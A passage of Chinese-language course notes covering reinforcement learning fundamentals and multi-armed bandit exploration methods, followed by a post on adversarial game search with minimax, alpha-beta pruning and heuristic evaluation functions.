这里 $s$ 和 $a$ 是当前状态和动作,$r$ 是奖励。返回的也是一个概率

对于任意 $s, a$,$\sum_r R(s, a, r) = 1$ 。也即,给定 $S$ 和 $A$​ 时所有可能奖励的概率之和为 1

奖励函数对智能体最优策略的影响

reward_func_1

reward_func_2

可以看到,选择不同力度的奖励函数,会导致智能体选择完全不同的策略。

智能体:策略 $\pi$ 和累积收益 $G$

策略 $\pi$

给出的动作选择可以是确定的,也可以是一个 概率 分布

  • $\pi$:策略函数 $\langle S, A \rangle \rightarrow \mathbb{R}^+ $,描述状态 $S$ 下采取动作 $a$ 的概率。
  • $\pi(s, a) = \Pr[a \mid s]$,$s$ 是当前状态,$a$ 是当前状态下的可选动作。
  • 对于任意 $s$,$\sum_a \pi(s, a) = 1$。

折扣因子 $\gamma$

$0 \leq \gamma \leq 1$,描述未来收益的重要程度,可以使得 $G$ 按照其指数衰减。

  • 若 $\gamma$ 为 1,则近的收益和远的收益一样重要。
  • 若 $\gamma$ 为 0,则只看下一步的收益(最贪心)。

累积收益 $G$​

  • $G = R_1 + \gamma R_2 + \gamma^2 R_3 + \cdots = \sum_{i=1}^T \gamma^{i-1} R_i$
  • $T$ 可以是有限的也 可以是无限的
  • 描述对于某个 $s_1, a_1, s_2, a_2, s_3, a_3, \cdots$​​ 状态动作序列的累积收益。

策略的评估和最优策略

策略 $\pi$ 的好坏用 状态价值 $V_\pi$ 来评估:

  • 状态价值 $V_\pi(s)$ 表示从状态 $s$ 出发执行策略 $\pi$ 能获得的 累计收益
  • 结束状态(如果有)的价值,总是零。

$$ v_\pi(s) \doteq \mathbb{E}\pi [G_t \mid S_t = s] = \mathbb{E}\pi \left[ \sum_{k=0}^{\infty} \gamma^k R_{t+k+1} \mid S_t = s \right], \text{ for all } s \in \mathcal{S} $$

其中,$\mathcal{S}$ 是状态空间。

显然从同一个状态 $S$ 出发,$V_\pi$ 越大,$\pi$ 越好。使得 $V$ 最大的 $\pi$ 就是 最优策略,记作 $\pi^$。执行 $\pi^$ 得到的价值,就是最优价值,记作 $V^*$​。

状态价值 $V_\pi$ 和动作价值 $Q_\pi$

状态价值 $V_\pi(s)$ :定义同前。

动作价值 $Q_\pi(s, a)$ :表示从 $s$ 出发并做动作 $a$,之后执行策略 $\pi$ 能获得的累计收益。有些时候计算动作价值更方便。

$$ Q_\pi(s, a) \doteq \mathbb{E}\pi [G_t \mid S_t = s, A_t = a] = \mathbb{E}\pi \left[ \sum_{k=0}^{\infty} \gamma^k R_{t+k+1} \mid S_t = s, A_t = a \right] $$

状态价值 $V_\pi$ 和动作价值 $Q_\pi$​ 的关系

$$ v_\pi(s)=\sum_{a\in\mathcal{A}(s)}\pi(a|s)Q_\pi(s,a) $$

$s$ 的状态价值:等价于 $s$ 下所有可行的动作 $a$ 的价值的加权和,按照策略选择动作的概率加权。

$$ Q_\pi(s,a)=\sum_{s\in\mathcal{S}}\sum_{r\in\mathcal{R}}p(s^{\prime},r|s,a)[r+\gamma v_\pi(s^{\prime})] $$

$a$ 的动作价值:等价于 $s$ 下,对所有经动作 $a$ 可以到达的状态 $s'$、获得的奖励 $r$ 对应的 即时奖励加上折扣后的未来状态价值 $r + \gamma v_\pi(s^{\prime})$ 的加权和,按照所有可能的 $s^{\prime}$ 和 $r$​ 的状态转移概率、奖励概率加权。

强化学习的任务

目标:得到最优 $V^$ 或 $Q^$ ,从而能得到最优策略 $\pi^*$

计算最优值

使用各种方法探索出 $V^$ 或 $Q^$

存储最优值

  • 状态多时,查找表保存所有状态的价值不现实(状态太多了,存不下)
  • 带参数的函数 来保存 $V_\pi(s)$ 和 $Q_\pi(s, a)$( 参数数目小于状态数
    • 学习过程中我们会调整参数,使之更符合观察到的实际收益。
    • 学习效果取决于带参数的近似函数的好坏。

智能体寻找最优策略的路径

智能体使用策略 $\pi_0$(开始可能是随机的)与环境交互,产生 经验 (Experience),然后根据经验,更新迭代,改进策略 $\pi$,以期获得更大的 $G$,如此往复。

寻找最优策略的几种思路

多臂老虎机问题

假设有一个玩家面对一排老虎机,每个老虎机有不同的概率发出奖励。玩家的目标是通过多次拉动这些拉杆,最大化累计的奖励。在每一步决策中,玩家需要面对 “探索(Exploration)” 和 “利用(Exploitation)” 之间的权衡:

  • 探索(Exploration):尝试不同的拉杆,以发现哪些拉杆的奖励更高。
  • 利用(Exploitation):选择已经知道收益较高的拉杆,以最大化即时奖励。

动作价值计算

  • 价值估计:动作 $a$ 的价值 $Q^(a)$ 是选择动作 $a$ 时的期望奖励(老虎机问题中,状态 $s$ 是不变的,不考虑 $s$ 了): $$ Q^(a) \approx \mathbb{E}[R_t | A_t = a] $$
  • 经验平均:通过对每个动作的奖励进行平均来估计其价值: $$ Q_t(a) = \frac{\sum_{i=1}^{t-1} R_i \cdot \mathbb{1}{A_i=a}}{\sum{i=1}^{t-1} \mathbb{1}_{A_i=a}} $$

其中,$\mathbb{1}$ 是指示函数,当且仅当 $A_i = a$​ 时为 1,否则为 0。这个式子说的是,对于所有选择动作 $a$ 的奖励求和,除以选择动作 $a$ 的次数。

根据大数定理,随着尝试次数的增加,$Q_t(a) \rightarrow Q^*(a)$。

增量计算动作价值

增量更新公式:为了避免存储大量历史数据,使用增量法更新动作价值:

$$ Q_{n+1} = Q_n + \frac{1}{n} [R_n - Q_n] $$

推导:

$$ \begin{aligned} Q_{n+1}&=\quad\frac1n\sum_{i=1}^nR_i\ &=\quad\frac1n\left(R_n+\sum_{i=1}^{n-1}R_i\right)\ &=\quad\frac1n\left(R_n+(n-1)\frac1{n-1}\sum_{i=1}^{n-1}R_i\right)\ &=\quad\frac1n\Big(R_n+(n-1)Q_n\Big)\ &=\quad\frac1n\Big(R_n+nQ_n-Q_n\Big)\ &=\quad Q_n+\frac1n\Big[R_n-Q_n\Big] \end{aligned} $$

这个式子将多个历史数据 压缩为均值和尝试次数,来显著减少了存储的数量。

动作价值的一般形式

$$ \text{NewEstimate} \leftarrow \text{OldEstimate} + \text{StepSize} \times (\text{Target} - \text{OldEstimate}) $$

其中:

  • NewEstimate:新的估计值
  • OldEstimate:旧的估计值
  • StepSize (n):步长,通常是一个学习率
  • Target:新的收益
  • Error:误差,即 $\text{Target} - \text{OldEstimate}$

算法

epsilon_greedy_algorithm

这是一个典型的 $\epsilon$ 贪心算法,用于多臂老虎机问题。

  1. 初始化

    对每个动作 $$a$$:

    $$ Q(a) \leftarrow 0 \ N(a) \leftarrow 0 $$

    • $Q(a)$:动作 $a$ 的价值估计
    • $N(a)$:动作 $a$ 被选择的次数
  2. 循环

    该算法不断循环执行以下步骤:

    • 选择动作 $A$:

      $$ A \leftarrow \begin{cases} \arg\max_a Q(a) & \text{with probability } 1 - \epsilon \ \text{a random action} & \text{with probability } \epsilon \end{cases} $$

      • 以 $1 - \epsilon$ 的概率选择当前估计价值最高的动作(贪心选择)
      • 以 $\epsilon$ 的概率随机选择一个动作(探索)
    • 执行动作并获得奖励 $R$:

      $$ R \leftarrow bandit(A) $$

      执行选择的动作 $A$ 并获得奖励 $R$

    • 更新选择次数

      $$ N(A) \leftarrow N(A) + 1 $$

      更新动作 $A$ 被选择的次数

    • 更新价值估计

      $$ Q(A) \leftarrow Q(A) + \frac{1}{N(A)} [R - Q(A)] $$

      使用步长 $\frac{1}{N(A)}$ 更新动作 $A$ 的价值估计

学习率 $\alpha$​ 的讨论

先前的算法等价于在下面这个公式中迭代时使用 $1/n$​ 作为学习率:

$$ Q_{n+1} = Q_n + \alpha [R_n - Q_n] $$

此时,学习率是非固定的,且随时间增加而衰减。由于其基于求平均推导,所以每次更新时,$Q_n$ 中的新旧值(即,最新一次的尝试所获得的奖励 $R_n$ 与暗含在 $Q_n$ 中的先前诸次尝试所获得的奖励)被等同(都是以 $1/n$ 的权重)看待。

但倘若我们想要更 偏向新值 信息,那么我们可以调整为固定学习率,从而保证最新值的权重最大:

$$ Q_{n+1} = \alpha R_n + (1 - \alpha) Q_n $$

逐步递归展开:

$$ Q_{n+1} = (1 - \alpha)^n Q_1 + \sum_{i=1}^{n} \alpha (1 - \alpha)^{n-i} R_i $$

贪心算法

简单贪心

核心思想:总是选择当前估值最高的动作。

$$ A_t \doteq \arg\max_a Q_t(a) $$

$\epsilon$ 贪心

核心思想:大部分时间选择贪心动作,偶尔随机选择

改进点:通过引入 随机性 来鼓励探索,避免陷入局部最优。

epsilon_greedy

观察可以发现,探索越多($\epsilon$​ 越大),收益越大,这是因为探索能让算法发现那些可能收益更高的老虎机,而不是过早地陷入局部最优解。

然而,如果 $\epsilon$ 继续增大,那么:

  • 收益可能进一步提高:如果当前的探索比例仍不足以找到全局最优解,增加探索比例可能会带来更高的收益。
  • 收益可能降低:过多的探索也可能导致收益降低,因为探索次数过多会影响到已经找到的高收益老虎机的利用。

乐观初值贪心

初值依赖:贪心和 $\epsilon$ 贪心策略依赖初值设定,通常设为 0。

设置初值对训练有如下影响:

  • 负面:参数设定依赖:初值需要由人工给出,且设定不当可能影响算法性能。
  • 正面:提供先验知识:合理的初值能提供先验经验,帮助算法确定奖励的期望量级。
  • 学习效率:初值越准确,算法需要的调整次数越少,学习效率越高。

探索鼓励:设定较高初值(如 $Q_1(a)=+5$),意味着初始时所有动作的估值都被 高估,由于贪心策略会选择当前估值最高的动作,算法会尝试不同的动作以验证其实际价值。可以鼓励探索(但是是临时性的),避免算法过早收敛到次优解。

对比分析:

  • 高初值($Q_1(a)=+5$):期望高,勇于尝试新路径。
  • 低初值($Q_1(a)=0$​​):探索保守。

进一步展开讲,则是这样的:

  1. 高初值设定的情况
    • 初始时,所有路径的估值都为 $+5$。
    • 策略选择任意一条路径,如路径 A,发现实际奖励为 $+2$,更新 $Q$ 值:$Q_2(A) = +2$。
    • 由于其他路径的估值仍为 $+5$,策略下一次会选择另一条路径,如路径 B,发现实际奖励为 $+3$,更新 $Q$ 值:$Q_2(B) = +3$。
    • 策略会继续选择其他未探索的路径直到所有路径的 $Q$ 值被更新到实际奖励。
  2. 低初值设定的情况
    • 初始时,所有路径的估值都为 $0$。
    • 策略选择任意一条路径,如路径 A,发现实际奖励为 $+2$,更新 $Q$ 值:$Q_2(A) = +2$。
    • 由于其他路径的估值仍为 $0$,而路径 A 的估值为 $+2$,策略会倾向于继续选择路径 A。
    • 策略可能过早地认为路径 A 是最优解,而不去探索其他路径。

epsilon_vs_optimstic

这张图展示了两种不同的 $\epsilon$ 贪心策略在一个多臂老虎机问题(multi-armed bandit problem)中的表现。

  1. 灰色曲线 (真实初值,$\epsilon$ 贪心)

    • 参数:$Q_1=0, \epsilon=0.1$
    • 解释:初始估计值设为 0,$\epsilon$ 值为 0.1 表示有 10% 的时间选择随机动作,90% 的时间选择当前估计的最佳动作。
    • 结果:由于初始估计值较低,算法一开始探索较多,随着时间推移逐渐收敛到一个较好的策略,但表现相对较平稳。
  2. 蓝色曲线 (乐观初值,简单贪心)

    • 参数:$Q_1=5, \epsilon=0$
    • 解释:初始估计值设为 5(一个较高的值),$\epsilon$ 值为 0 表示总是选择当前估计的最佳动作(贪心策略)。
    • 结果:由于初始估计值较高,算法一开始对动作的估计值较乐观,迅速选择那些看似更优的动作。随着时间推移,算法逐渐调整这些估计值,最终也能收敛到一个较好的策略,但开始时的学习速度较快。

收敛结果:

  1. 灰色曲线($\epsilon$ 贪心)由于一直在探索,收敛更慢,最终收敛到了一个局部最优解。
  2. 蓝色曲线(乐观初值),加速了初期的学习过程,但是找到了一个较好的路径后失去了探索能力,依据此路径,快速收敛,最终收敛到了一个相较灰色曲线的更优解。

适用性

  • 固定问题:问题环境和奖励机制在整个学习过程中不发生变化,也即 $P(s'|s, a)$ 和 $R(s, a)$ 固定,乐观初值有效

    利用 高初值 鼓励探索,迅速收敛到最优解

  • 非固定问题:问题环境或奖励机制会随时间变化,也即 $P(s'|s, a, t)$ 和 $R(s, a, t)$ 随时间 $t$ 变化,乐观初值探索 不适用,$\epsilon$ 贪心更适用。

    通过 随机选择 保持探索,适应环境变化。

Upper Confidence Bound (UCB)

核心思想:

  • 因为不确定性总是存在,所以需要探索。
  • 贪心算法只能选择当前看似最好的动作,但其他动作可能更好。
  • UCB 方法将 “当前估值” 和 “新鲜程度” 加权和。

$$ A_t \doteq \arg\max_a \left[ Q_t(a) + c \sqrt{\frac{\ln t}{N_t(a) + \epsilon}} \right] $$

其中:

  • $Q_t(a)$ 是动作 $a$ 在时间 $t$ 的估值
  • $N_t(a)$ 是动作 $a$ 在时间 $t$ 前被选择的次数
  • $c$ 是控制探索程度的常数

如果 $N_t(a)=0$,中括号内的值会很大,此时,对应的动作 $a$ 被认为是一个取值最大的动作,即最有可能被选择(也即 UCB 算法会强制选择对应的动作 $a$),这确保了每个动作至少被尝试一次,这样可以避免贪心策略带来的局限性,从而实现更全面的探索。

Gradient Bandit Algorithms 梯度下降

核心思想:

  • $\epsilon$ 贪心大概率选最好的动作,其他动作 等同对待,其实也可以给每个动作一个对应的选择概率
  • 通过给每个动作 $a$ 一个 数值优先度 $H_t(a) \in \mathbb{R}$,来影响选择概率。
  • 优先度越大,动作被选中的概率越大。

据此,我们给出如下设计:

  • 采用 Softmax 函数归一化,使所有可行动作的概率和为 1:

    $$ \text{Pr}{A_t = a} \doteq \frac{e^{H_t(a)}}{\sum_{b=1}^k e^{H_t(b)}} \doteq \pi_t(a) $$

  • 初始时,所有动作的倾向性相同($H_1(a)=0$)

  • 在每一步,按概率选择了动作 $A_t$ 后得到及时奖励 $R_t$,根据奖励 $R_t$ 的大小,修改所有动作的优先度:

    $$ H_{t+1}(A_t) = H_t(A_t) + \alpha (R_t - \bar{R_t})(1 - \pi_t(A_t)) \ H_{t+1}(a) = H_t(a) - \alpha (R_t - \bar{R_t})\pi_t(a), \quad \text{for all } a \neq A_t $$

    当 $R_t > \bar{R_t}$​ 时,我们认为此动作的奖励优于奖励均值(参照值),所以提高他的优先级,降低其他动作的优先级

    否则,降低此动作的优先级,提高其他动作的优先级。

$\bar{R_t}$ 除了设定为奖励均值外,也可以人为固定,如果能够 合理的划分出好的动作和坏的动作,那就是成功的:

gradient_bandit_bar_rt

算法比较

  1. $\epsilon$ 贪心算法有一小部分时间随机选:随机的探索 (是持久性的,因为在全过程一直在以 $\epsilon$ 的概率探索非最优的动作)

  2. UCB 偏向尝试次数小的动作:根据统计的探索 (是否探索依赖于已经探索过的次数)

  3. 梯度下降法不是估计动作的价值,而是动作的优先顺序选动作。其实也有探索,因为动作采用 Softmax, 有概率 (不过如果选取规则就是直接选择最大概率的贪心,那就没有探索了)

  4. 简单的设置 乐观初值 可以使得贪心算法也具有相当的 探索性 (是临时性的,只有在早期有效)

💾

对抗搜索

2024年5月19日 23:34

问题模型

对抗性

在零和游戏中,总收益为零,一方的收益必然是另一方的损失。常见于竞争性环境,如内卷现象。

非零和游戏中,总收益不为零,各方通过最大化自身利益,有时还需要合作。损人不一定利己,可以多方共同从第三方获取收益。

人数分类

  • 单人游戏:仅一个参与者
  • 双人游戏:两个参与者
  • 多人游戏:三个及以上参与者

随机性

  • 确定性游戏:动作引发的后果是确定的
  • 非确定性游戏:动作引发的后果是不确定的

状态可见性

  • 完全信息游戏:所有信息对所有玩家都是已知的
  • 非完全信息游戏:对玩家存在未知信息

同步性

  • 同步游戏:所有玩家同时进行决策
  • 异步游戏:玩家依次进行决策

环境的可变性

  • 环境信息不变游戏:游戏环境信息保持不变
  • 环境信息变化游戏:游戏环境信息会发生变化

双人零和游戏

游戏定义

一个双人零和游戏可以定义为一个 搜索 问题,包含以下元素:

  • S0:初始状态,描述游戏开始时的状态。
  • PLAYER(s):在某个局面下,轮到哪个玩家选择动作。
  • ACTIONS(s):返回在某个状态下的合法动作集合。
  • RESULT(s,a):状态转移模型,一个动作执行后到达哪个状态。
  • TERMINAL-TEST(s):游戏结束返回 true,否则返回 false。游戏结束时的状态称为终止状态。
  • UTILITY(s, p):效用函数(目标函数或者支付函数),表示游戏结束时玩家 $p$ 的得分。零和游戏中,所有玩家得分的和为零。

搜索树复杂性

游戏的难点在于 搜索树可能非常大

  • 国际象棋
    • 平均每步有 35 个选择。
    • 每个选手需要走 50 步,两人总共 100 步。
    • 搜索树节点数:$35^{100}$ 或 $10^{154}$ 个节点。
  • 围棋
    • 平均每步有 250 个选择。
    • 每个选手需要走 150 步,两人总共 300 步。
    • 搜索树节点数:$250^{300}$ 或 $10^{720}$ 个节点。

过往的搜索算法无法遍历和存储如此大的搜索树,这使得问题变得非常困难。

然而,即使无法计算最优动作,游戏依然需要做出某种决策。为此,我们需要进一步优化搜索过程。

极大极小搜索 MINIMAX

MINIMAX 方法遍历所有可能发生的局面,找出最佳方案。其假设 对手和自己一样聪明,对手总是 最小化 你的收益,而你则 最大化 自己的收益。你采取的方案是 相对稳妥 的方案。

这就是极大极小(Minimax)搜索的雏形,其基本思路如下:

  • 状态:局面
  • 动作:在该局面下,该走棋的玩家的合法动作
  • 状态转移:一步过后的所有可能局面
  • 极大极小搜索:在决策树上的游历,假设敌人和自己一样聪明

minimax_search_tree

这张图中,各个层的选值都是选择下面的分支的,然后传递到上面的分支

伪代码

minimax_pesudo_code

可以通过合并符号来简化伪代码,得到一个类似于如下的序列:

$$ -1,1,-1,1,-1,1,-1,1,\ldots $$

minimax_pesudo_code_concise

其中核心一句在 v ← max(v, -GetValue(y)),这句 -GetValue(y) 中的负号会不断地颠倒 max 操作的实际上取方向,从而使得一个一直上取的 GetValue 函数等价于原先的交替上下取的版本。

若依据此写法,则实际上并没显性的 Max 节点和 Min 节点的区分了。而是仅仅根据从根节点迭代到当前节点,一共乘了几次负号来判断(不包含当前节点的 v ← max(v, -GetValue(y)) 中的负号):

  • 如果乘的是偶数次负号,则是 Max 节点
  • 如果乘的是奇数次负号,则是 Min 节点

极大极小搜索算法采用 深度优先搜索算法 (递归调用 GetValue 函数直至抵达代表终止状态的叶节点,意味着深度优先)。假设搜索树的深度是 $m$,每个结点有 $b$ 个合法操作,则极大极小算法的时间复杂度是 $O(b^m)$​。空间复杂度如下:

  • 展开所有儿子结点:$O(b^m)$
  • 只展开一个儿子:$O(m)$

这意味着在真实的复杂对弈中,此模型并不实用。

记忆与估值

1956 年,IBM 的 Arthur Samuel 制作了西洋跳棋 AI,能够轻松打败新手玩家。该 AI 基于极大极小搜索,并增加了 学习能力,包括:

  • 死记硬背学习:直接使用之前极大极小搜索的计算结果对每步进行估值。
  • 一般化学习:通过 参数化 的估值函数,不断调整参数以缩小计算 估值 和实际评价的差距。

这种学习方法带来了 AI 水平的突破性进展(不同于类似全局估值表这样的字典,一般化学习实际上使用了更少的参数来表示估值函数,大大提高了同硬件水平下的性能)。深蓝和 AlphaGo 都是上述第二种算法的演化版本,利用参数化模型预测真实估值。

这里的估值,可以理解为先前神经网络中,你训练得到的推理结果。

缩小估值与实际评价的差距,就是类似于之前不断反向传播从而减小损失函数,提高神经网络性能。

Alpha-Beta 剪枝算法

Alpha-Beta 剪枝算法在搜索时返回与极大极小搜索相同的结果,但 忽略 了搜索树上那些不会影响最终结果的部分。可以认为,Alpha-Beta 剪枝算法是极大极小搜索算法的简化版本。

剪枝:是指在搜索树中去掉一些分支,以减少计算量。这里的剪枝是 无损失 的,不会影响最终结果。

伪代码

$$ \begin{array}{l} \textbf{function} \ \text{ALPHA-BETA-SEARCH}(state) \ \textbf{returns} \ \text{an action} \ \quad v \leftarrow \text{MAX-VALUE}(state, -\infty, +\infty) \ \quad \textbf{return} \ \text{the action in} \ \text{ACTIONS}(state) \ \text{with value} \ v \end{array} $$

  • 初始条件:最大下界 $\alpha$ 设置为 $-\infin$,最小上界 $\beta$ 设置为 $+\infin$。
  • 这个函数是搜索的入口。它接受当前的状态节点 state,并调用 MAX-VALUE 函数开始搜索
  • 由于我们要最大化自己的效益函数,所以通过 MAX-VALUE 函数来遍历当前节点的子节点(以及更多的后继节点),MAX-VALUE 函数返回的是一个价值 $v$,我们根据这个 $v$​ 找到对应的动作 action

$$ \begin{array}{l} \textbf{function} \ \text{MAX-VALUE}(state, \alpha, \beta) \ \textbf{returns} \ \text{a utility value} \ \quad \textbf{if} \ \text{TERMINAL-TEST}(state) \ \textbf{then return} \ \text{UTILITY}(state) \ \quad v \leftarrow -\infty \ \quad \textbf{for each} \ a \ \textbf{in} \ \text{ACTIONS}(state) \ \textbf{do} \ \quad \quad v \leftarrow \max(v, \text{MIN-VALUE}(\text{RESULT}(s, a), \alpha, \beta)) \ \quad \quad \textbf{if} \ v \geq \beta \ \textbf{then return} \ v \ \quad \quad \alpha \leftarrow \max(\alpha, v) \ \quad \textbf{return} \ v \ \end{array} $$

  • 传入参数:当前状态 state,当前状态的最大下界 $\alpha$,当前状态的最小上界 $\beta$。

  • 初始条件:如果当前状态是终止状态(TERMINAL-TEST(state)),直接返回状态的效用值 UTILITY(state)

  • 初始化:将 $v$ 初始化为 $-\infin$,因为我们现在是在 Max 层,所以我们的目标是不断的 最大化下界 以提高我们的效用函数的输出,这对应了后续的更新 $\alpha$ 的操作。

  • 遍历动作:对每个可能的动作 a,计算该动作结果状态的价值。这个结果状态通过 MIN-VALUE 函数评估。注意,与 MAX-VALUE 函数相对,MIN-VALUE 函数代表对手,其目标是不断地 最小化上界 以削弱我们效益函数的输出,MIN-VALUE 返回的是下一层能拿到的 最小上界。在这个循环遍历的过程中,我们会不断的更新 $v$,它指示本层可能拿到的 最大值

  • 剪枝条件:如果当前状态可能拿到的最大值 $v$ 的值已经累进到大于或等于传入的当前最小上界 $\beta$,则可以停止继续评估剩下的动作,直接返回 $v$。这是因为当前层是一个 MAX-VALUE 层,我们返回的状态价值必然大于等于 $v$ ,当前层的上一层(若有)又是一个 MIN-VALUE 层,它不可能在已知有更小可能的 $\beta$ 下选择当前节点的返回值。所以本节点于更新上层状态节点的估值完全无益了,提前返回可以实现剪枝,避免多余的计算。

    beta_pruning

    极小值冗余如图所示,这是一颗博弈树的某一部分,节点 B 的值为 10($\beta=10$),节点 D 的值为 19,这里,C 节点为取最大值 max 节点。

    因此,C 的值将大于等于 19($v \geq 19 \geq \beta$);

    节点 A 为取极小值的 min 节点(这就是 $v \geq \beta$ 推知剪枝的根本原因),

    因此 A 的值只能取 B 的值 10,也就是说不再需要求节点 C 的子节点 E 和 F 的值就可以得出节点 A 的值。

    这样将节点 D 的后继兄弟节点减去称为 Beta 剪枝。^1

  • 更新 $\alpha$:如果上述剪枝条件没有满足,那么意味着我们找到了一个更大的 $v$,我们更新当前的最大下界 $\alpha$,即 $\alpha \leftarrow \max(\alpha, v)$。

    要注意在整个过程中 $\alpha,\beta$ 的作用域,$\beta$ 一直不变,$\alpha$ 在动作迭代间改变,方便 Min-Value 函数用于剪枝。

  • 最后,返回 $v$​​,它代表本节点能够获得的最大效益。

这里建议参照 OI Wiki / Alpha-Beta 剪枝 的具体图例理解。

$$ \begin{array}{l} \textbf{function} \ \text{MIN-VALUE}(state, \alpha, \beta) \ \textbf{returns} \ \text{a utility value} \ \quad \textbf{if} \ \text{TERMINAL-TEST}(state) \ \textbf{then return} \ \text{UTILITY}(state) \ \quad v \leftarrow +\infty \ \quad \textbf{for each} \ a \ \textbf{in} \ \text{ACTIONS}(state) \ \textbf{do} \ \quad \quad v \leftarrow \min(v, \text{MAX-VALUE}(\text{RESULT}(s, a), \alpha, \beta)) \ \quad \quad \textbf{if} \ v \leq \alpha \ \textbf{then return} \ v \ \quad \quad \beta \leftarrow \min(\beta, v) \ \quad \textbf{return} \ v \ \end{array} $$

  • 分析类似上面 MAX-VALUE 的情形。

  • 剪枝条件:

    alpha_pruning

    极大值冗余如图所示,这也是一颗博弈树的某一部分,节点下的数据为该节点的值,节点 B 的值为 20($\alpha = 20$),节点 D 的值为 15,这里,C 为取极小值的 min 节点。

    因此节点 C 的值将小于等于 15 ($v \leq 15 \leq \alpha$​);

    节点 A 为取最大值 max 的节点(这就是 $v \leq \alpha$ 推知剪枝的根本原因),因此 A 只可能取到 B 的值,也是就说不再需要搜索 C 的其他子节点 E 和 F 的值就可以得出节点 A 的值。

    这样将节点 D 的后继兄弟节点减去称为 Alpha 剪枝。^1

剪枝条件总结 ^1

  • 当一个 Min 节点的 $v$ 值 ≤ 任何一个祖先节点的最大上界 $α$ 时 ,剪掉该节点及其所有子节点
  • 当一个 Max 节点的 $v$ 值 ≥ 任何一个祖先节点的最小上界 $β$​ 时 ,剪掉该节点及其所有子节点

整体实战可以参考 7forz / 一图流解释 Alpha-Beta 剪枝(Alpha-Beta Pruning) 理解,这个链接里的题也比较类似于往年题里的,强烈建议阅读。

二合一伪代码

$$ \begin{array}{l} \textbf{function} \ \text{GET-VALUE}(node, \alpha, \beta) \ \quad \textbf{if} \ node \ \text{is a Leaf node} \ \textbf{then} \ \quad \quad \textbf{return} \ \text{the result of the game} \ \quad \textbf{end if} \ \quad v \leftarrow -\infty \ \quad \textbf{for each} \ y \ \in \ \text{Subnodes}(node) \ \textbf{do} \ \quad \quad v \leftarrow \max(v, -\text{GET-VALUE}(y, -\beta, -\max(\alpha, v))) \ \quad \quad \textbf{if} \ v > \beta \ \textbf{then} \ \quad \quad \quad \textbf{return} \ v \ \quad \quad \textbf{end if} \ \quad \textbf{end for} \ \quad \textbf{return} \ v \ \textbf{end function} \ \end{array} $$

同样是仿照先前的思路,我们依旧是通过不断的变号、颠倒上下界来完成合并。

注意,在这个过程中 $\alpha$ 实际上不会改变。这对应了无论是在 Max-Value 还是在 Min-Value 中,实际上都有一侧的界没有更新:

  • Max-Value 中,我们不断的更新最大下界 $\alpha$,而最小上界 $\beta$ 一直是不变的。
  • Min-Value 中,我们不断的更新最小上界 $\beta$,而最大下界 $\alpha$ 一直是不变的。

复杂度分析

最好情况

  1. 节点展开情况:

    • 第一层:每个节点生出 $b$ 个儿子
    • 第二层:每个节点生出 1 个儿子,其他节点全都在此节点获得到界值后被剪枝
    • 第三层:每个节点生出 $b$ 个儿子,这对应上一层中第 1 个儿子获得界值的过程
    • 依次类推,一层 $b$、一层 1、一层 $b$...

    best_situation_of_alpha_beta_pruning

  2. 层数关系:假设树的最大深度为 $m$,则有 $b$ 的层数为 $m/2$

在最好的情况下,我们只需检查 $O(b^{m/2})$ 个节点即可找到最优解。这比 Minimax 算法的 $O(b^m)$ 复杂度要好得多。具体来说:

  • 每个状态平均有 $\sqrt{b}$ 个选择,而不是 $b$ 个选择
  • 从另一个角度看,Alpha-Beta 算法可以在相同时间内比 Minimax 算法搜索更深一倍的节点

最差情况

在最差情况下,Alpha-beta 剪枝算法并不能减少任何节点的评估数量。这种情况发生在节点按照最差顺序进行搜索时,即每次都先访问最不优的节点,导致完全没有任何剪枝发生。其时间复杂度与 Minimax 算法相同,同为:$O(b^m)$

平均情况

在平均情况下,Alpha-beta 剪枝算法的时间复杂度介于最优情况和最差情况之间。一般情况下,平均时间复杂度近似为 $O(b^{3m/4})$

不完美的实时决策

  • 传统方法:Minimax 或 Alpha-beta 算法都需要直接搜索到终局状态(叶子节点),计算准确的胜负,这对于搜索树很深的情况并不好。
  • 改进方法:用启发式函数 EVAL 在非叶子节点 进行估值,从而提前截断搜索。也即,在没有搜索到终局状态时,若满足一定条件(Cutoff Test),提前使用 EVAL 给出一个返回值,从而避免一直要(深度)搜索到叶子节点(即满足 Terminal Test)才能使用真实效用函数 UTILITY,加快计算效率。

状态估值函数的特性

  • 终局状态估值函数和真实得分的一致性:在游戏的终局状态,状态估值函数必须给出与真实得分一致的值。这意味着当游戏结束时,估值函数应该准确反映当前局面的得分情况。也即,此时必须有 EVAL == UTILITY
  • 计算效率:估值函数的计算不能花费太多时间。
  • 强相关性:非终局条件下,估值函数在非终局状态下要与最终胜负有很 强的正相关性

状态估值函数的设计

一个很自然的想法是,设计各种特征,并对特征进行线性加权,从而获得一个状态估值函数:

$$ \mathrm{EVAL}(s)=w_1 f_1(s)+w_2 f_2(s)+\cdots+w_n f_n(s)=\sum_{i=1}^n w_i f_i(s) $$

但是,采用线性加权函数作为状态估值函数的效果并不好,因为他假设每个特征的贡献是 独立 的,以及是可以线性估值的,但是在真实情况中,这都是不一定的:

  • 不同的特征之间可能有复杂的相互影响,导致非独立性
  • 估值函数可能不是平滑线性变化的

而且,手工设计特征和特征权重,实际上是基于人为提供的 先验经验 的,且不说其是否准确可用,对于一些游戏,甚至不一定有。

因而,我们可以采用先前的机器学习方法来学到一个的 非线性 的复杂估值函数,从而拟合真实情况。

状态估值函数的应用

当我们有了状态估值函数后,我们就可以用 cutoff test 替代 terminal test,提前返回估值函数 eval 的值来加快搜索。

// before
if TERMINAL-TEST(state) then return UTILITY(state)
// after
if CUTOFF-TEST(state, depth) then return EVAL(state)
  • 在搜索深度达到搜索深度限制 $d$ 时,调用 eval 函数返回估值。
  • 如果不好确定深度,可以使用 迭代加深 方法。当深度限制到了,算法返回搜索到的最深一层所返回的值。若深度限制到了但没找到终局,就让深度限制大一点,继续搜索。
  • 估值函数还可以用来对子结点排序,好的节点排在前面,可以提升 Alpha-Beta 剪枝的效率。

$$ \text{H-Minimax}(s, d) =\ \begin{cases} \text{Eval}(s) & \text{if } \text{Cutoff-Test}(s, d) \ \max_{a \in \text{Actions}(s)} \text{H-Minimax}(\text{Result}(s, a), d + 1) & \text{if Player}(s) = \text{MAX} \ \min_{a \in \text{Actions}(s)} \text{H-Minimax}(\text{Result}(s, a), d + 1) & \text{if Player}(s) = \text{MIN} \end{cases} $$

小结

实时决策:指在规定时间内给出决策结果。例如下棋时,需要在走子时限内做出决策。

不完美的实施决策:问题规模很大的时候,受限于时间限制,我们 无法搜索到终局,也就无从准确的胜负情况,因此决策是不完美的。

解决方法:

  1. 使用 启发式状态估值函数 来估计当前状态的价值
  2. 限定搜索深度,到了一定深度就截断搜索
